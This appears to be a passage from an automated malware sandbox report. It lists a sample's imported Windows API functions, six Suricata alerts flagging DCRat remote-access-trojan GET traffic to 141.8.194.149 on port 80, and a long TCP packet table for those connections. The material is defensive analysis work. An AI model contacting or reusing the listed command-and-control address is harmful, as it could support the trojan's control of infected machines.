                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                  gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-27T08:42:23.336887+02002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949714141.8.194.14980TCP
                                  2024-09-27T08:42:44.758842+02002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949715141.8.194.14980TCP
                                  2024-09-27T08:42:57.134633+02002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949716141.8.194.14980TCP
                                  2024-09-27T08:43:21.620955+02002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949718141.8.194.14980TCP
                                  2024-09-27T08:43:36.033260+02002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949719141.8.194.14980TCP
                                  2024-09-27T08:43:53.823199+02002034194ET MALWARE DCRAT Activity (GET)1192.168.2.949720141.8.194.14980TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 27, 2024 08:42:22.637758017 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:22.642633915 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:22.643263102 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:22.643987894 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:22.648855925 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321708918 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321749926 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321768045 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321784019 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321798086 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321813107 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321827888 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321844101 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321857929 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.321871996 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.336886883 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.341792107 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.341845036 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.341861010 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.341876030 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.345356941 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.436616898 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436640024 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436655998 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436671019 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436687946 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436717987 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.436764002 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.436923027 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436938047 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.436955929 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.437174082 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.437485933 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.437501907 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.437525988 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.437549114 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.437557936 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.437566042 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.437591076 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.438431978 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.438478947 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.438517094 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.438533068 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.438549042 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.438565016 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.438571930 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.438627958 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.439429998 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.439445019 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.439459085 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.439474106 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.439577103 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.451992989 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.452008009 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.452023983 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.459352970 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.551656008 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551680088 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551696062 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551709890 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551727057 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551740885 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551755905 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551770926 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551830053 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551913977 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551928043 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.551943064 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.553873062 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.554033995 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.572715998 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.577567101 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780380964 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780410051 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780421972 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780436039 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780453920 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780459881 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.780467033 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780482054 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780483961 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.780493975 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780507088 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.780520916 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.780544043 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781527042 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781538010 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781549931 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781585932 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781613111 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781699896 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781712055 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781760931 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.781825066 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781923056 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781934977 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.781965017 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782052040 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782129049 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782133102 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782140970 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782192945 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782502890 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782562017 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782573938 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782613993 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782618999 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782632113 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782644033 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782655001 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.782680035 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.782793045 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783430099 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783442020 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783456087 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783479929 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783498049 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783508062 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783519030 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783529997 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783543110 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.783561945 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.783576012 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.784481049 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784492970 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784531116 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.784672976 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784686089 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784701109 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784712076 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784723997 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.784730911 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.784748077 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.785177946 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785233974 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.785233974 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785320997 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785331964 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785343885 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785356045 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785367012 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.785376072 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.785412073 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:23.786159039 CEST8049714141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:23.793143988 CEST4971480192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.081712008 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.088145018 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.088211060 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.088402987 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.094772100 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758685112 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758759975 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758783102 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758800983 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758816957 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758833885 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758841991 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758841991 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758852959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758872986 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758886099 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758904934 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.758933067 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758934021 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.758979082 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.763771057 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763787985 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763803959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763818979 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.763931990 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.763931990 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.845395088 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873106003 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873131037 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873150110 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873164892 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873167992 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873188019 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873204947 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873208046 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873260021 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873434067 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873478889 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873509884 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873524904 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.873548985 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.873578072 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874027967 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874084949 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874089003 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874100924 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874118090 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874135971 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874177933 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874207020 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874767065 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874804974 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874820948 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874835968 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874855995 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.874994040 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.874994040 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.878129959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.878145933 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.878160000 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.878197908 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.878226995 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.886284113 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.886307001 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.886370897 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.932163954 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.932178974 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.932306051 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987766981 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987803936 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987819910 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987838984 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987858057 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987874985 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987891912 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987894058 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987894058 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987920046 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987937927 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.987941027 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.987962008 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.988008976 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.988024950 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.988042116 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:44.988054991 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.988095045 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.990245104 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:44.994997025 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228665113 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228874922 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228943110 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.228995085 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229034901 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229038000 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229078054 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229142904 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229147911 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229182959 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229216099 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229223013 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229255915 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229298115 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229321957 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229337931 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229340076 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229352951 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229367971 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229384899 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229401112 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229418039 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229437113 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229454994 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229470968 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229485989 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229505062 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229506016 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229557037 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229701996 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229723930 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229739904 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229779005 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229793072 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229804039 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229804039 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229809046 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229825020 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.229888916 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.229888916 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230246067 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230264902 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230281115 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230307102 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230334044 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230349064 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230364084 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230380058 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230391979 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230429888 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230437040 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230448008 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230467081 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230477095 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230484962 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230504036 CEST8049715141.8.194.149192.168.2.9
                                  Sep 27, 2024 08:42:45.230530977 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.230556011 CEST4971580192.168.2.9141.8.194.149
                                  Sep 27, 2024 08:42:45.231239080 CEST8049715141.8.194.149192.168.2.9
